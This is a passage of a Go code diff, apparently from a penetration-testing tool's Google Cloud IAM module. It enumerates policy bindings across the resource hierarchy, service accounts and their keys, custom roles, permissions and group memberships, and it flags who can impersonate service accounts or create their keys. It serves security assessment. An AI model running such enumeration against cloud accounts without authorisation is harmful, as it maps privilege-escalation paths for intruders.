For service accounts + Description string `json:"description"` // For service accounts + Disabled bool `json:"disabled"` // For service accounts + UniqueID string `json:"uniqueId"` // For service accounts + HasKeys bool `json:"hasKeys"` // Service account has user-managed keys + KeyCount int `json:"keyCount"` // Number of user-managed keys + HasCustomRoles bool `json:"hasCustomRoles"` // Has any custom roles assigned + CustomRoles []string `json:"customRoles"` // List of custom role names +} + +// ServiceAccountInfo represents detailed info about a service account +type ServiceAccountInfo struct { + Email string `json:"email"` + Name string `json:"name"` // Full resource name + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Disabled bool `json:"disabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + // Key information + HasKeys bool `json:"hasKeys"` + KeyCount int `json:"keyCount"` + Keys []ServiceAccountKeyInfo `json:"keys"` + // Role information + Roles []string `json:"roles"` + HasCustomRoles bool `json:"hasCustomRoles"` + CustomRoles []string `json:"customRoles"` + HasHighPrivilege bool `json:"hasHighPrivilege"` + HighPrivRoles []string `json:"highPrivRoles"` + // Pentest: Impersonation information + CanBeImpersonatedBy []string `json:"canBeImpersonatedBy"` // Principals who can impersonate this SA + CanCreateKeysBy []string `json:"canCreateKeysBy"` // Principals who can create keys for this SA + CanGetAccessTokenBy []string `json:"canGetAccessTokenBy"` // Principals with getAccessToken + CanSignBlobBy []string `json:"canSignBlobBy"` // Principals with signBlob + CanSignJwtBy []string `json:"canSignJwtBy"` // Principals with signJwt + HasImpersonationRisk bool `json:"hasImpersonationRisk"` // True if any impersonation path exists + ImpersonationRiskLevel string `json:"impersonationRiskLevel"` // CRITICAL, HIGH, MEDIUM, LOW +} + +// SAImpersonationInfo represents who can impersonate/abuse a service account +type SAImpersonationInfo struct { + ServiceAccount string `json:"serviceAccount"` + ProjectID string `json:"projectId"` + TokenCreators []string `json:"tokenCreators"` // iam.serviceAccounts.getAccessToken + KeyCreators []string `json:"keyCreators"` // iam.serviceAccountKeys.create + SignBlobUsers []string `json:"signBlobUsers"` // iam.serviceAccounts.signBlob + SignJwtUsers []string `json:"signJwtUsers"` // iam.serviceAccounts.signJwt + ImplicitDelegators []string `json:"implicitDelegators"` // iam.serviceAccounts.implicitDelegation + ActAsUsers []string `json:"actAsUsers"` // iam.serviceAccounts.actAs + SAAdmins []string `json:"saAdmins"` // iam.serviceAccounts.* (full admin) + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ServiceAccountKeyInfo represents a service account key +type ServiceAccountKeyInfo struct { + Name string `json:"name"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyOrigin string `json:"keyOrigin"` // GOOGLE_PROVIDED or USER_PROVIDED + KeyType string `json:"keyType"` // USER_MANAGED or SYSTEM_MANAGED + ValidAfter time.Time `json:"validAfter"` + ValidBefore time.Time `json:"validBefore"` + Disabled bool `json:"disabled"` +} + +// CustomRole represents a custom IAM role +type CustomRole struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + IncludedPermissions []string `json:"includedPermissions"` + Stage string `json:"stage"` // ALPHA, BETA, GA, DEPRECATED, DISABLED + Deleted bool `json:"deleted"` + Etag string `json:"etag"` + ProjectID string `json:"projectId"` // Empty if org-level + OrgID string `json:"orgId"` // Empty if project-level + IsProjectLevel bool `json:"isProjectLevel"` + PermissionCount int `json:"permissionCount"` +} + +// GroupMember represents a member of a Google Group +type GroupMember struct { + Email string `json:"email"` + Type string `json:"type"` // USER, SERVICE_ACCOUNT, GROUP (nested) + Role string `json:"role"` // OWNER, MANAGER, MEMBER + Status string `json:"status"` // ACTIVE, SUSPENDED, etc. + IsExternal bool `json:"isExternal"` // External to the organization +} + +// GroupInfo represents a Google Group (for tracking group memberships) +type GroupInfo struct { + Email string `json:"email"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Roles []string `json:"roles"` // Roles assigned to this group + ProjectID string `json:"projectId"` + Members []GroupMember `json:"members"` // Direct members of this group + NestedGroups []string `json:"nestedGroups"` // Groups that are members of this group + MemberCount int `json:"memberCount"` // Total direct members + HasNestedGroups bool `json:"hasNestedGroups"` + MembershipEnumerated bool `json:"membershipEnumerated"` // Whether we successfully enumerated members +} + +// CombinedIAMData holds all IAM-related data for a project +type CombinedIAMData struct { + Principals []PrincipalWithRoles `json:"principals"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + InheritedRoles []PolicyBinding `json:"inheritedRoles"` } -var logger internal.Logger +var logger = internal.NewLogger() -func projectAncestry(projectID string) ([]AncestryResource, error) { +func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, error) { ctx := context.Background() - projectsClient, err := resourcemanager.NewProjectsClient(ctx) + + // Use the v1 GetAncestry API which only requires project-level read permissions + // This avoids needing resourcemanager.folders.get on each folder in the hierarchy + var crmService *crmv1.Service + var err error + + if s.session != nil { + crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) + } else { + crmService, err = crmv1.NewService(ctx) + } if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer projectsClient.Close() - foldersClient, err := resourcemanager.NewFoldersClient(ctx) + resp, err := crmService.Projects.GetAncestry(projectID, &crmv1.GetAncestryRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer foldersClient.Close() - resourceID := "projects/" + projectID + // GetAncestry returns ancestors from bottom to top (project first, then parent folders, then org) + // We need to reverse to get org -> folders -> project order var ancestry []AncestryResource - - for { - if strings.HasPrefix(resourceID, "organizations/") { - ancestry = append(ancestry, AncestryResource{Type: "organization", Id: strings.TrimPrefix(resourceID, "organizations/")}) - break - } else if strings.HasPrefix(resourceID, "folders/") { - resp, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access folder %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - break // Stop processing further if a folder is inaccessible - } - ancestry = append(ancestry, AncestryResource{Type: "folder", Id: strings.TrimPrefix(resp.Name, "folders/")}) - resourceID = resp.Parent - } else if strings.HasPrefix(resourceID, "projects/") { - resp, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access project %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - return nil, fmt.Errorf("failed to get project: %v", err) - } - ancestry = append(ancestry, AncestryResource{Type: "project", Id: strings.TrimPrefix(resp.Name, "projects/")}) - resourceID = resp.Parent - } else { - return nil, fmt.Errorf("unknown resource type for: %s", resourceID) + for i := len(resp.Ancestor) - 1; i >= 0; i-- { + ancestor := resp.Ancestor[i] + if ancestor.ResourceId != nil { + ancestry = append(ancestry, AncestryResource{ + Type: ancestor.ResourceId.Type, + Id: ancestor.ResourceId.Id, + }) } } - // Reverse the slice as we've built it from child to ancestor - for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { - ancestry[i], ancestry[j] = ancestry[j], ancestry[i] - } - return ancestry, nil } // Policies fetches IAM policy for a given resource and all policies in resource ancestry func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyBinding, error) { ctx := context.Background() - client, err := resourcemanager.NewProjectsClient(ctx) + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } if err != nil { - return nil, fmt.Errorf("resourcemanager.NewProjectsClient: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -124,7 +264,7 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB // Fetch the IAM policy for the resource policy, err := client.GetIamPolicy(ctx, req) if err != nil { - return nil, fmt.Errorf("client.GetIamPolicy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } // Assemble the policy bindings @@ -145,17 +285,50 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB } func determinePrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { + switch { + case strings.HasPrefix(member, "user:"): return "User" - } else if strings.HasPrefix(member, "serviceAccount:") { + case strings.HasPrefix(member, "serviceAccount:"): return "ServiceAccount" - } else if strings.HasPrefix(member, "group:") { + case strings.HasPrefix(member, "group:"): return "Group" - } else { + case strings.HasPrefix(member, "domain:"): + return "Domain" + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "principal:"): + return "WorkloadIdentity" + case strings.HasPrefix(member, "principalSet:"): + return "WorkloadIdentityPool" + default: return "Unknown" } } +// extractEmail extracts the clean email/identifier from a member string +func extractEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} + +// isCustomRole checks if a role is a custom role +func isCustomRole(role string) bool { + return strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") +} + func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) ([]PrincipalWithRoles, error) { policyBindings, err := s.Policies(resourceID, resourceType) if err != nil { @@ -165,16 +338,465 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) principalMap := make(map[string]*PrincipalWithRoles) for _, pb := range policyBindings { for _, member := range pb.Members { - principalType := determinePrincipalType(member) // Implement this function based on member prefix + principalType := determinePrincipalType(member) if principal, ok := principalMap[member]; ok { principal.PolicyBindings = append(principal.PolicyBindings, pb) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } principalMap[member] = &PrincipalWithRoles{ Name: member, Type: principalType, + Email: extractEmail(member), PolicyBindings: []PolicyBinding{pb}, ResourceID: resourceID, ResourceType: resourceType, + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, + } + } + } + } + + var principals []PrincipalWithRoles + for _, principal := range principalMap { + principals = append(principals, *principal) + } + + return principals, nil +} + +// contains checks if a string slice contains a specific string +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ServiceAccounts retrieves all service accounts in a project with detailed info +func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var serviceAccounts []ServiceAccountInfo + + // List all service accounts in the project + req := iamService.Projects.ServiceAccounts.List("projects/" + projectID) + err = req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saInfo := ServiceAccountInfo{ + Email: sa.Email, + Name: sa.Name, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + Description: sa.Description, + Disabled: sa.Disabled, + OAuth2ClientID: sa.Oauth2ClientId, + } + + // Get keys for this service account + keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list keys for %s", sa.Email)) + } else { + saInfo.Keys = keys + // Count user-managed keys only + userManagedCount := 0 + for _, key := range keys { + if key.KeyType == "USER_MANAGED" { + userManagedCount++ + } + } + saInfo.KeyCount = userManagedCount + saInfo.HasKeys = userManagedCount > 0 + } + + serviceAccounts = append(serviceAccounts, saInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return serviceAccounts, nil +} + +// getServiceAccountKeys retrieves keys for a service account +func (s *IAMService) getServiceAccountKeys(ctx context.Context, iamService *iam.Service, saName string) ([]ServiceAccountKeyInfo, error) { + var keys []ServiceAccountKeyInfo + + resp, err := iamService.Projects.ServiceAccounts.Keys.List(saName).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, key := range resp.Keys { + keyInfo := ServiceAccountKeyInfo{ + Name: key.Name, + KeyAlgorithm: key.KeyAlgorithm, + KeyOrigin: key.KeyOrigin, + KeyType: key.KeyType, + Disabled: key.Disabled, + } + + // Parse timestamps + if key.ValidAfterTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidAfterTime); err == nil { + keyInfo.ValidAfter = t + } + } + if key.ValidBeforeTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidBeforeTime); err == nil { + keyInfo.ValidBefore = t + } + } + + keys = append(keys, keyInfo) + } + + return keys, nil +} + +// CustomRoles retrieves all custom roles in a project +func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { + ctx := context.Background() + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var customRoles []CustomRole + + // List project-level custom roles + req := iamService.Projects.Roles.List("projects/" + projectID) + req.ShowDeleted(true) // Include deleted roles for security awareness + err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { + for _, role := range page.Roles { + customRole := CustomRole{ + Name: role.Name, + Title: role.Title, + Description: role.Description, + IncludedPermissions: role.IncludedPermissions, + Stage: role.Stage, + Deleted: role.Deleted, + Etag: role.Etag, + ProjectID: projectID, + IsProjectLevel: true, + PermissionCount: len(role.IncludedPermissions), + } + customRoles = append(customRoles, customRole) + } + return nil + }) + if err != nil { + // Don't fail completely - we might just not have access to list roles + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list custom roles for project %s", projectID)) + } + + return customRoles, nil +} + +// PoliciesWithInheritance fetches IAM policies including inherited ones from folders and organization +func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, error) { + ctx := context.Background() + + // Get project's ancestry + ancestry, err := s.projectAncestry(projectID) + if err != nil { + // If we can't get ancestry, just return project-level policies + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only", projectID)) + return s.Policies(projectID, "project") + } + + var allBindings []PolicyBinding + + // Get policies for each resource in the ancestry (org -> folders -> project) + for _, resource := range ancestry { + bindings, err := s.getPoliciesForResource(ctx, resource.Id, resource.Type) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get policies for %s/%s", resource.Type, resource.Id)) + continue + } + + // Mark inherited bindings + for i := range bindings { + if resource.Type != "project" || resource.Id != projectID { + bindings[i].IsInherited = true + bindings[i].InheritedFrom = fmt.Sprintf("%s/%s", resource.Type, resource.Id) + } + } + + allBindings = append(allBindings, bindings...) + } + + return allBindings, nil +} + +// policyCache caches successful policy lookups per resource +var policyCache = make(map[string][]PolicyBinding) + +// policyFailureCache tracks resources we've already failed to get policies for +var policyFailureCache = make(map[string]bool) + +// getPoliciesForResource fetches policies for a specific resource using the appropriate client +func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID string, resourceType string) ([]PolicyBinding, error) { + cacheKey := resourceType + "/" + resourceID + + // Check success cache first + if bindings, ok := policyCache[cacheKey]; ok { + return bindings, nil + } + + // Check failure cache - return permission denied without logging again + if policyFailureCache[cacheKey] { + return nil, gcpinternal.ErrPermissionDenied + } + + var resourceName string + + switch resourceType { + case "project": + var client *resourcemanager.ProjectsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "projects/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "folder": + var client *resourcemanager.FoldersClient + var err error + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "folders/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + case "organization": + var client *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + resourceName = "organizations/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + policyFailureCache[cacheKey] = true + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil + + default: + return nil, fmt.Errorf("unsupported resource type: %s", resourceType) + } +} + +// convertPolicyToBindings converts an IAM policy to PolicyBinding slice +func convertPolicyToBindings(policy *iampb.Policy, resourceID, resourceType, resourceName string) []PolicyBinding { + var bindings []PolicyBinding + for _, binding := range policy.Bindings { + pb := PolicyBinding{ + Role: binding.Role, + Members: binding.Members, + ResourceID: resourceID, + ResourceType: resourceType, + PolicyName: resourceName + "_policyBindings", + } + + // Parse condition if present + if binding.Condition != nil { + pb.Condition = binding.Condition.String() + pb.HasCondition = true + pb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + + bindings = append(bindings, pb) + } + return bindings +} + +// CombinedIAM retrieves all IAM-related data for a project +func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { + var data CombinedIAMData + + // Get principals with roles (includes inheritance tracking) + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return data, fmt.Errorf("failed to get principals: %v", err) + } + data.Principals = principals + + // Get service accounts with details + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + // Don't fail completely + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get service accounts") + } else { + data.ServiceAccounts = serviceAccounts + } + + // Get custom roles + customRoles, err := s.CustomRoles(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get custom roles") + } else { + data.CustomRoles = customRoles + } + + // Extract groups from principals + var groups []GroupInfo + groupMap := make(map[string]*GroupInfo) + for _, p := range principals { + if p.Type == "Group" { + if _, exists := groupMap[p.Email]; !exists { + groupMap[p.Email] = &GroupInfo{ + Email: p.Email, + ProjectID: projectID, + Roles: []string{}, + } + } + for _, binding := range p.PolicyBindings { + groupMap[p.Email].Roles = append(groupMap[p.Email].Roles, binding.Role) + } + } + } + for _, g := range groupMap { + groups = append(groups, *g) + } + data.Groups = groups + + return data, nil +} + +// PrincipalsWithRolesEnhanced gets principals with roles including inheritance info +func (s *IAMService) PrincipalsWithRolesEnhanced(projectID string) ([]PrincipalWithRoles, error) { + policyBindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + principalMap := make(map[string]*PrincipalWithRoles) + for _, pb := range policyBindings { + for _, member := range pb.Members { + principalType := determinePrincipalType(member) + // Create a binding copy for this principal + principalBinding := PolicyBinding{ + Role: pb.Role, + Members: []string{member}, + ResourceID: pb.ResourceID, + ResourceType: pb.ResourceType, + Condition: pb.Condition, + PolicyName: pb.PolicyName, + IsInherited: pb.IsInherited, + InheritedFrom: pb.InheritedFrom, + } + + if principal, ok := principalMap[member]; ok { + principal.PolicyBindings = append(principal.PolicyBindings, principalBinding) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } + } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } + principalMap[member] = &PrincipalWithRoles{ + Name: member, + Type: principalType, + Email: extractEmail(member), + PolicyBindings: []PolicyBinding{principalBinding}, + ResourceID: projectID, + ResourceType: "project", + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, } } } @@ -187,3 +809,1057 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) return principals, nil } + +// GetMemberType returns the member type for display purposes +func GetMemberType(member string) string { + return determinePrincipalType(member) +} + +// PermissionEntry represents a single permission with its source information +type PermissionEntry struct { + Permission string `json:"permission"` + Role string `json:"role"` + RoleType string `json:"roleType"` // "predefined", "custom", "basic" + ResourceID string `json:"resourceId"` + ResourceType string `json:"resourceType"` + IsInherited bool `json:"isInherited"` + InheritedFrom string `json:"inheritedFrom"` + HasCondition bool `json:"hasCondition"` + Condition string `json:"condition"` +} + +// EntityPermissions represents all permissions for an entity +type EntityPermissions struct { + Entity string `json:"entity"` + EntityType string `json:"entityType"` + Email string `json:"email"` + ProjectID string `json:"projectId"` + Permissions []PermissionEntry `json:"permissions"` + Roles []string `json:"roles"` + TotalPerms int `json:"totalPerms"` + UniquePerms int `json:"uniquePerms"` +} + +// RolePermissions caches role to permissions mapping +var rolePermissionsCache = make(map[string][]string) + +// rolePermissionsFailureCache tracks roles we've already failed to look up (to avoid duplicate error logs) +var rolePermissionsFailureCache = make(map[string]bool) + +// GetRolePermissions retrieves the permissions for a given role +func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { + // Check cache first + if perms, ok := rolePermissionsCache[roleName]; ok { + return perms, nil + } + + // Check if we've already failed to look up this role + if rolePermissionsFailureCache[roleName] { + return nil, gcpinternal.ErrPermissionDenied + } + + var iamService *iam.Service + var err error + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var permissions []string + + // Handle different role types + if strings.HasPrefix(roleName, "roles/") { + // Predefined role + role, err := iamService.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "projects/") { + // Project-level custom role + role, err := iamService.Projects.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "organizations/") { + // Organization-level custom role + role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + // Cache the failure to avoid repeated error logs + rolePermissionsFailureCache[roleName] = true + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + permissions = role.IncludedPermissions + } + + // Cache the result + rolePermissionsCache[roleName] = permissions + return permissions, nil +} + +// GetRoleType determines the type of role +func GetRoleType(roleName string) string { + switch { + case strings.HasPrefix(roleName, "roles/owner") || strings.HasPrefix(roleName, "roles/editor") || strings.HasPrefix(roleName, "roles/viewer"): + return "basic" + case strings.HasPrefix(roleName, "projects/") || strings.HasPrefix(roleName, "organizations/"): + return "custom" + default: + return "predefined" + } +} + +// GetEntityPermissions retrieves all permissions for a specific entity +func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, entity string) (*EntityPermissions, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + entityPerms := &EntityPermissions{ + Entity: entity, + EntityType: determinePrincipalType(entity), + Email: extractEmail(entity), + ProjectID: projectID, + Permissions: []PermissionEntry{}, + Roles: []string{}, + } + + // Track unique permissions + uniquePerms := make(map[string]bool) + rolesSet := make(map[string]bool) + + // Process each binding + for _, binding := range bindings { + // Check if this entity is in the binding + found := false + for _, member := range binding.Members { + if member == entity { + found = true + break + } + } + if !found { + continue + } + + // Track the role + if !rolesSet[binding.Role] { + rolesSet[binding.Role] = true + entityPerms.Roles = append(entityPerms.Roles, binding.Role) + } + + // Get permissions for this role + permissions, err := s.GetRolePermissions(ctx, binding.Role) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for role %s", binding.Role)) + continue + } + + // Create permission entries + for _, perm := range permissions { + permEntry := PermissionEntry{ + Permission: perm, + Role: binding.Role, + RoleType: GetRoleType(binding.Role), + ResourceID: binding.ResourceID, + ResourceType: binding.ResourceType, + IsInherited: binding.IsInherited, + InheritedFrom: binding.InheritedFrom, + HasCondition: binding.HasCondition, + } + if binding.ConditionInfo != nil { + permEntry.Condition = binding.ConditionInfo.Title + } + + entityPerms.Permissions = append(entityPerms.Permissions, permEntry) + + if !uniquePerms[perm] { + uniquePerms[perm] = true + } + } + } + + entityPerms.TotalPerms = len(entityPerms.Permissions) + entityPerms.UniquePerms = len(uniquePerms) + + return entityPerms, nil +} + +// GetAllEntityPermissions retrieves permissions for all entities in a project +func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissions, error) { + ctx := context.Background() + + // Get all principals + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return nil, err + } + + var allPerms []EntityPermissions + + for _, principal := range principals { + entityPerms, err := s.GetEntityPermissions(ctx, projectID, principal.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for %s", principal.Name)) + continue + } + allPerms = append(allPerms, *entityPerms) + } + + return allPerms, nil +} + +// GetGroupMembership retrieves members of a Google Group using Cloud Identity API +// Requires cloudidentity.groups.readonly or cloudidentity.groups scope +func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) (*GroupInfo, error) { + var ciService *cloudidentity.Service + var err error + if s.session != nil { + ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) + } else { + ciService, err = cloudidentity.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo := &GroupInfo{ + Email: groupEmail, + Members: []GroupMember{}, + } + + // First, look up the group to get its resource name + // Cloud Identity uses groups/{group_id} format + lookupReq := ciService.Groups.Lookup() + lookupReq.GroupKeyId(groupEmail) + + lookupResp, err := lookupReq.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupName := lookupResp.Name + + // Get group details + group, err := ciService.Groups.Get(groupName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.DisplayName = group.DisplayName + groupInfo.Description = group.Description + + // List memberships + membershipsReq := ciService.Groups.Memberships.List(groupName) + err = membershipsReq.Pages(ctx, func(page *cloudidentity.ListMembershipsResponse) error { + for _, membership := range page.Memberships { + member := GroupMember{ + Role: membership.Roles[0].Name, // OWNER, MANAGER, MEMBER + } + + // Get member details from preferredMemberKey + if membership.PreferredMemberKey != nil { + member.Email = membership.PreferredMemberKey.Id + } + + // Determine member type + if membership.Type == "GROUP" { + member.Type = "GROUP" + groupInfo.NestedGroups = append(groupInfo.NestedGroups, member.Email) + groupInfo.HasNestedGroups = true + } else if strings.HasSuffix(member.Email, ".iam.gserviceaccount.com") { + member.Type = "SERVICE_ACCOUNT" + } else { + member.Type = "USER" + } + + groupInfo.Members = append(groupInfo.Members, member) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + } + + groupInfo.MemberCount = len(groupInfo.Members) + groupInfo.MembershipEnumerated = true + + return groupInfo, nil +} + +// GetGroupMemberships retrieves members for all groups found in IAM bindings +func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo) []GroupInfo { + var enrichedGroups []GroupInfo + + for _, group := range groups { + enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) + if err != nil { + // Log but don't fail - Cloud Identity API access is often restricted + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate membership for group %s", group.Email)) + // Keep the original group info without membership + 